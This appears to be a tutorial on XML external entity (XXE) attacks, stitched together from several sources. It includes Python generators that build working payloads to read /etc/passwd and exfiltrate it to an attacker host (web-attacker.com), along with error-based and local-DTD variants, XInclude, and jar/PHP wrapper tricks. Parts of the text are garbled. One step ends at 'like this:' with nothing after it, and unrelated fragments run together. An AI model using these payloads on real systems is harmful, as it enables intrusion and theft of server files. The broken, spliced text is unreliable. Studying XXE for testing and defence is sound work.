`&lt;` and `&gt;` represent the characters `<` and `>`. These are metacharacters used to denote XML tags, and so must generally be represented using their entities when they appear within data.

`<!ELEMENT stockCheck ANY>` means that any content can appear inside the parent element `<stockCheck></stockCheck>`. A stricter element declaration can instead state that `<stockCheck>` can only have the children `<productId>` and `<storeId>`.
A DTD is declared in a `DOCTYPE` element at the start of the XML document. The DTD can be fully self-contained within the document itself (known as an "internal DTD"), can be loaded from elsewhere (known as an "external DTD"), or can be a hybrid of the two.

Custom entities are defined within the DTD. For example:

```xml
<!DOCTYPE foo [ <!ENTITY myentity "my entity value" > ]>
```

Any use of the entity reference `&myentity;` within the XML document will be replaced with the defined value: "my entity value".

External entities are custom entities whose value is loaded from outside the document. Their declaration uses the `SYSTEM` keyword and must specify a URL from which the value of the entity should be loaded. For example:

```xml
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "http://normal-website.com" > ]>
```

The URL can use the `file://` protocol, and so external entities can be loaded from file. For example:

```xml
<!DOCTYPE foo [ <!ENTITY ext SYSTEM "file:///path/to/file" > ]>
```
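The file-loading external entity above, run through a parser, as an added example that is not code from the original page: the standard-library `xml.sax` parser (expat underneath) is run twice on the same document, once with external general entities enabled, which is the vulnerable setting, and once with the default, which ignores them. The `stockCheck` document, the file name `secret.txt` and its content are constructed here and stand in for `/etc/passwd`.

```python
import io
import os
import tempfile
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges


class ProductIdCollector(ContentHandler):
    """Collect the character data inside <productId>: the value an
    application would echo back to the client in its response."""

    def __init__(self):
        super().__init__()
        self.inside = False
        self.chunks = []

    def startElement(self, name, attrs):
        if name == "productId":
            self.inside = True

    def endElement(self, name):
        if name == "productId":
            self.inside = False

    def characters(self, content):
        if self.inside:
            self.chunks.append(content)

    def value(self):
        return "".join(self.chunks)


def xxe_document(target_url):
    """Internal DTD declaring an external general entity, then referencing
    it inside the element whose value the application reflects."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE foo [ <!ENTITY ext SYSTEM "{url}"> ]>\n'
        "<stockCheck><productId>&ext;</productId><storeId>1</storeId></stockCheck>\n"
    ).format(url=target_url).encode()


def parse_product_id(document, resolve_external):
    """Parse with xml.sax.  resolve_external=True switches external general
    entity resolution back on (off by default since Python 3.7.1); with it
    on, SYSTEM entities are fetched through urllib, so file:// and http://
    URLs are followed and their content is spliced into the document."""
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, resolve_external)
    handler = ProductIdCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(document))
    return handler.value()


def demo():
    """Run both configurations against a file created only for this demo."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "secret.txt")
        with open(secret, "w") as fh:
            fh.write("db_password=hunter2")  # constructed stand-in for /etc/passwd
        document = xxe_document("file://" + secret)
        return {
            "vulnerable": parse_product_id(document, resolve_external=True),
            "hardened": parse_product_id(document, resolve_external=False),
        }


if __name__ == "__main__":
    for mode, value in demo().items():
        print(mode, repr(value))
```

The vulnerable run returns the file content as the product id; the default run returns an empty string because the entity is skipped. One caveat that applies to every parser, not just this one: the fetched content is parsed as XML entity text, so a file containing `<` or `&` (or, for some parsers, a stray newline at the end) breaks the parse, which is why `/etc/passwd` and `/etc/hostname` are the usual first targets and why the PHP base64 wrapper is useful for anything else.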
XML parameter entities are a special kind of entity that can only be referenced elsewhere within the DTD. They are declared with a percent character before the name:

```xml
<!ENTITY % myparameterentity "my parameter entity value" >
```

and are referenced with the percent character instead of the usual ampersand: `%myparameterentity;`.

Blind XXE, where nothing is reflected in the response, can still be detected out of band. For example:

```xml
<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://f2g9j7hhkax.web-attacker.com"> %xxe; ]>
```

This payload declares an XML parameter entity called `xxe` and then uses the entity within the DTD. This will cause a DNS lookup and HTTP request to the attacker's domain, verifying that the attack was successful.

When the parsed value is reflected, try to read `/etc/passwd` in different ways. For Windows you could try to read `C:\windows\system32\drivers\etc\hosts`. Note that in such a payload the `stockCheck` element can be declared as `ANY`, so the parser accepts whatever the entity expands to as its content.

Blind XXE can also be used to exfiltrate file contents out of band. The malicious DTD used to exfiltrate a file such as `/etc/hostname` (the steps below use `/etc/passwd`) works as follows:

1. Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file.
2. Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `exfiltrate`. The `exfiltrate` entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the `file` entity within the URL query string.
3. Uses the `eval` entity, which causes the dynamic declaration of the `exfiltrate` entity to be performed.
4. Uses the `exfiltrate` entity, so that its value is evaluated by requesting the specified URL.

The attacker hosts this DTD at a URL such as `http://web-attacker.com/malicious.dtd`. The submitted XXE payload then declares an XML parameter entity called `xxe` pointing at that URL and uses the entity within the DTD. This will cause the XML parser to fetch the external DTD from the attacker's server and interpret it inline. The steps defined within the malicious DTD are then executed, and the `/etc/passwd` file is transmitted to the attacker's server. A file whose content contains newlines cannot be carried in an HTTP URL this way, so multi-line files need another protocol (such as `ftp://`) or the error-based technique that follows.
A malicious external DTD that makes the parser leak the `/etc/passwd` file in an error message works as follows:

1. Defines an XML parameter entity called `file`, containing the contents of the `/etc/passwd` file.
2. Defines an XML parameter entity called `eval`, containing a dynamic declaration of another XML parameter entity called `error`. The `error` entity will be evaluated by loading a nonexistent file whose name contains the value of the `file` entity.
3. Uses the `eval` entity, which causes the dynamic declaration of the `error` entity to be performed.
4. Uses the `error` entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the `/etc/passwd` file.

Note that an external DTD allows one parameter entity to be referenced inside the definition of another (as `eval` does), but this is prohibited in the internal DTD. Therefore, you can't force an error without using an external DTD (usually).

When the server cannot fetch the attacker's DTD (no outbound connections), an external DTD that already exists on the server's filesystem can be repurposed. For example, suppose there is a DTD file on the server filesystem at the location `/usr/local/app/schema.dtd`, and this DTD file defines an entity called `custom_entity`. An attacker can trigger an XML parsing error message containing the contents of the `/etc/passwd` file by submitting a hybrid DTD that carries out the following steps:

1. Defines an XML parameter entity called `local_dtd`, containing the contents of the external DTD file that exists on the server filesystem.
2. Redefines the XML parameter entity called `custom_entity`, which is already defined in the external DTD file. The entity is redefined as containing the error-based XXE exploit that was already described, for triggering an error message containing the contents of the `/etc/passwd` file.
3. Uses the `local_dtd` entity, so that the external DTD is interpreted, including the redefined value of the `custom_entity` entity. This results in the desired error message.

The redefinition wins because the XML specification binds the first declaration of an entity and the internal subset is read before the external DTD is loaded. A DTD that is commonly present on Linux systems is `/usr/share/yelp/dtd/docbookx.dtd`, containing an entity called `ISOamso`.
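The three DTD constructions described above (out-of-band exfiltration, error-based leakage, and the hybrid that repurposes a local DTD), written out by a small generator as an added example that is not code from the original page. The attacker host `web-attacker.com`, the collector path and the `file:///nonexistent/` prefix are assumptions; the entity names `file`, `eval`, `exfiltrate`, `error`, `local_dtd` and the local DTD path follow the text. The generator also encodes the escaping rule the hybrid needs: inside an entity value declared in the internal subset, every `%` must be written as `&#x25;`, and the declaration nested one level deeper therefore needs `&#x26;#x25;`. The only parsing done is a local well-formedness check with external entity loading left off, so nothing is fetched.

```python
import xml.sax
from xml.sax.handler import ContentHandler

# External DTD for out-of-band exfiltration: file -> eval -> exfiltrate.
# Inside an entity value a literal '%' is written as &#x25; so the nested
# declaration is only evaluated once %eval; is expanded.
OOB_DTD = (
    '<!ENTITY % file SYSTEM "file://{target}">\n'
    '<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM \'{collector}?x=%file;\'>">\n'
    "%eval;\n"
    "%exfiltrate;\n"
)

# External DTD for error-based leakage: file -> eval -> error, where the
# nonexistent path carries the file content into the parser error message.
ERROR_DTD = (
    '<!ENTITY % file SYSTEM "file://{target}">\n'
    '<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM \'file:///nonexistent/%file;\'>">\n'
    "%eval;\n"
    "%error;\n"
)

BODY = "<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>\n"


def oob_dtd(target_file, collector_url):
    """malicious.dtd to host on the attacker's server (OOB variant)."""
    return OOB_DTD.format(target=target_file, collector=collector_url)


def error_dtd(target_file):
    """malicious.dtd to host on the attacker's server (error-based variant)."""
    return ERROR_DTD.format(target=target_file)


def external_dtd_document(dtd_url):
    """Document to submit: declares the parameter entity xxe pointing at the
    hosted DTD and references it so the parser fetches and interprets it."""
    return (
        '<?xml version="1.0"?>\n'
        '<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "{url}"> %xxe; ]>\n' + BODY
    ).format(url=dtd_url).encode()


def embed_in_internal_subset(dtd_text):
    """Escape a DTD fragment so it can sit inside a single-quoted parameter
    entity value in the internal subset, where literal '%' references are
    forbidden.  '&' is escaped first so the references produced for '%' and
    the quote are not escaped a second time."""
    return (dtd_text.replace("&", "&#x26;")
                    .replace("%", "&#x25;")
                    .replace("'", "&#x27;"))


def local_dtd_document(local_dtd_path, entity_name, dtd_text):
    """Hybrid DTD: load a DTD that already exists on the server's filesystem
    and redefine one of its parameter entities with the exploit; the first
    declaration (ours, in the internal subset) is the one that binds."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        '<!ENTITY % local_dtd SYSTEM "file://{path}">\n'
        "<!ENTITY % {name} '\n{body}'>\n"
        "%local_dtd;\n"
        "]>\n" + BODY
    ).format(path=local_dtd_path, name=entity_name,
             body=embed_in_internal_subset(dtd_text)).encode()


def well_formed(document):
    """Sanity check before sending: the stdlib SAX parser does not load
    external entities by default, so this only validates the syntax."""
    try:
        xml.sax.parseString(document, ContentHandler())
        return True
    except xml.sax.SAXParseException:
        return False


if __name__ == "__main__":
    print(external_dtd_document("http://web-attacker.com/malicious.dtd").decode())
    print(error_dtd("/etc/passwd"))
    print(local_dtd_document("/usr/share/yelp/dtd/docbookx.dtd", "ISOamso",
                             error_dtd("/etc/passwd")).decode())
```

`well_formed` passes a document whose external parameter entity is simply skipped, so it catches quoting mistakes in the hybrid payload (an unescaped `'` or `%` inside the entity value) before the request is sent; it says nothing about whether the target parser will follow the entities.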
Open `./unzipped/word/document.xml` in your favourite text editor (vim) and edit the XML to contain your favourite XXE payload. The first thing I try tends to be an HTTP request, like this:

The `jar` protocol is only available in Java applications. It allows access to files inside a PKZIP archive (`.zip`, `.jar`, ...) and works for local and remote files. Behind the scenes, resolving a remote `jar:` URL makes an HTTP request to load the archive (`https://download.host.com/myarchive.zip`), saves the HTTP response to a temporary location (`/tmp/...`), extracts the archive and reads `file.zip`, and finally deletes the temporary files. Because the extracted files only exist while the download is in progress, a slow HTTP server is used to keep them on disk long enough to be referenced; there is a Python implementation, `slow_http_server.py`, and one in Java, `slowserver.jar`.
When you only control a fragment of an XML document that the server assembles and parses, you cannot define or modify a `DOCTYPE` element. However, you might be able to use `XInclude` instead. `XInclude` is a part of the XML specification that allows an XML document to be built from sub-documents. You can place an `XInclude` attack within any data value in an XML document, so the attack can be performed in situations where you only control a single item of data that is placed into a server-side XML document.

To perform an `XInclude` attack, you need to reference the `XInclude` namespace (`http://www.w3.org/2001/XInclude`) and provide the path to the file that you wish to include.

Other wrappers: the entity URL can also use the `data://` protocol, and instead of `file:/` you can use PHP wrappers such as `php://filter/convert.base64-encode/resource=` to access internal files (base64 keeps characters that would break the XML, such as `<`, `&` and newlines, out of the parsed value).
to access internal files.XLIFF (XML Localization Interchange File Format) is an XML-based bitext format created to standardize the way localizable data are passed between and among tools during a localization process and a common format for CAT tool exchange.
A file such as `/etc/passwd` can then be exfiltrated using the out-of-band technique (newlines in the file content are the usual obstacle, since they cannot be carried in the request URL). With the error-based variant, first check that the name of a non-existent file is reflected in the error messages; next, add the file content to that name.